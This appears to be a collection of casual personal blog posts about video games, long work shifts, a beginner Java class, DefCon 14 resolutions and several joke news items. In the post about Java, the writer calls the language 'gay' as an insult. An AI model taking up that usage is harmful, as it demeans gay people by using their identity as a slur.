9AFED9BEADBBD9236159D54CAE - tsunami 1B59B6E87D19E9A6F1D37CB762 - home ’nuf said.

Age of Empires II - Age of Kings. That is a great game. It has something that not a lot of games have these days. Which is replay value. Once you beat a game, that is it. No more fun. You know all the secrets.
That is where MMORPG came into the picture. But still most of them are still lacking. You can get to Level 60 or Level 70 and you have reached the top.

Today is my last day on a looooog…. 12 hour shift work week. Right now I am hating my life. (Just because of work). It is so busy that I actually have to take a second of it to settle down and moan and complain. So here it is:

Right now I am taking a class called “Intro to Programming”. And yup! you guessed it! The first assignment is to make a Hello World program. For those who don’t know, that is the Globaly accepted first assignment for programming languages, be it HTML, Java, C++, PHP, python, or Assembly. Now this is where I get to voice my opinion of Java so far: It bites! Any language that makes you write 3 lines of code just to print “Hello World” is gay.

(This is a joke) IN BREAKING NEWS: The Marine Corps has adopted the no Tat policy. In this bold move, it is Dishonorably discharging 80% of it’s current personnel due to this new “Clean or Out” program.

One should never be made to make a decision such as the one I’m about to share with you: Where I work, there are two Male restrooms. One is downstairs, still within ‘hurry’ distance, and the other is just across the hall. You are probably thinking, ‘Where is the decision in that?’. Well this is where it gets interesting. Both are alright for number 1 traffic. No big deal, in and out.

To celebrate the close of DefCon 13 here are my…
New Defcon (14) Resolutions.
Get l0gic a girl to take to DefCon
Get duder out to the east coast
Make and print Project Mentor T-Shirts to give away and wear to DefCon
Creat a DCMar Group
Watch Family Guy and Futurerama episodes as instructed by l0gic
Get BFA w/ Card

I have offically uncovered the US Air Force’s TOP SECRET plans at making a deadly infantry. The following image was stolen from a secret base in Roswell. I will stay with this story as long as it takes to unveil the truth.